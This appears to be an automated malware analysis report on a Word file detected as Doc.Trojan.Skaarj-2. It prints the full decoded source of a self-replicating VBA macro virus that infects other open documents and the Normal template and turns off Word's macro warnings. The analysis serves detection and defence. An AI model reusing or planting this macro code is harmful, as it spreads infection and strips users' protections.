Verdict: MALICIOUS
Risk Score: 80
Malware Insights
MITRE ATT&CK: T1059.005 (Visual Basic)
The sample is a Microsoft Word document containing VBA macros. The macros are designed to spread themselves to other documents and templates: the Document_Close handler searches the VBA components of every open document and of the Normal template for the 'JERRY © MoDule-S 2002' marker and, wherever the marker is absent, replaces that component's Document_Close procedure with its own copy, saving the document or template afterwards. It also sets Options.VirusProtection to 0, which disables Word's built-in macro warning. This behavior suggests a macro-based malware dropper or worm that persists through the Normal template. The ClamAV detection of 'Doc.Trojan.Skaarj-2' further supports its malicious nature.
Heuristics (2)
- ClamAV: Doc.Trojan.Skaarj-2 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Skaarj-2
- VBA macros detected (medium, OLE_VBA_MACROS): Document contains VBA macro code
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3734 bytes | 5b736421f9c04d9a1c7d43c15594b4f0e597c57f61a9e30b9fdc3f8fe0005f4b |
Preview script (first 1,000 lines of the extracted script):
```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
    Const Mark = "JERRY © MoDule-S 2002"
    On Error GoTo handler
    Dim WDoc As Word.Document, M As Object, c As Object, Infected As Boolean, Found As Boolean
    Dim Saved As Boolean, Mon As String, Phrase As Byte, t As Long, i As Long, n As Boolean, Process As Byte
    Set M = Nothing
    n = False
    If Application.UserName <> "IDm@n" Then
        MsgBox "JERRY is running." & Chr(10) & "Thank you!", vbInformation, Mark
        With Application
            .UserName = "IDm@n"
            .UserInitials = "MDS"
            .UserAddress = "idman@nwgsm.ru"
        End With
        With ActiveDocument
            .BuiltInDocumentProperties(1) = Mark
            .BuiltInDocumentProperties(2) = "Infected by JERRY"
            .BuiltInDocumentProperties(3) = "IDm@n"
            .BuiltInDocumentProperties(4) = "MoDule-S"
            .BuiltInDocumentProperties(5) = "© MoDule-S 2002"
            .Saved = True
        End With
    End If
    Process = 0
    Found = False
    For Each c In NormalTemplate.VBProject.VBComponents
        If c.Type = 100 Then
            If c.CodeModule.Find(Mark, 1, 1, 100000, 100000) Then
                Found = True
                Set M = c.CodeModule
            End If
        End If
    Next
    Do
        For Each WDoc In Word.Documents
            If WDoc.SaveFormat = wdFormatDocument Or WDoc.SaveFormat = wdFormatTemplate Then
                For Each c In WDoc.VBProject.VBComponents
                    If c.Type = 100 Then
                        If c.CodeModule.Find(Mark, 1, 1, 100000, 100000) Then
                            Set M = c.CodeModule
                            Found = True
                        ElseIf Found Then
                            Saved = WDoc.Saved
                            On Error GoTo handler
                            t = c.CodeModule.ProcBodyLine("Document_Close", vbext_pk_Proc)
                            c.CodeModule.DeleteLines t, c.CodeModule.ProcCountLines("Document_Close", vbext_pk_Proc)
out:
                            c.CodeModule.InsertLines t, M.Lines(M.ProcBodyLine("Document_Close", vbext_pk_Proc), M.ProcCountLines("Document_Close", vbext_pk_Proc))
                            If Saved Then WDoc.Save
                            Infected = True
                        Else
                            frmMain.Show
                        End If
                    End If
                Next
            End If
        Next
        Process = Process + 1
        If Process = 3 Then Exit Do
    Loop Until Infected
    If Found Then
        For Each c In NormalTemplate.VBProject.VBComponents
            If c.Type = 100 Then
                If Not c.CodeModule.Find(Mark, 1, 1, 100000, 100000) Then
                    Saved = NormalTemplate.Saved
                    n = True
                    t = c.CodeModule.ProcBodyLine("Document_Close", vbext_pk_Proc)
                    c.CodeModule.DeleteLines t, c.CodeModule.ProcCountLines("Document_Close", vbext_pk_Proc)
out1:
                    c.CodeModule.InsertLines t, M.Lines(M.ProcBodyLine("Document_Close", vbext_pk_Proc), M.ProcCountLines("Document_Close", vbext_pk_Proc))
                    If Saved Then NormalTemplate.Save
                End If
            End If
        Next
    End If
    With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
    Exit Sub
handler:
    t = 1
    If n = False Then
        Resume out
    Else
        Resume out1
    End If
End Sub
```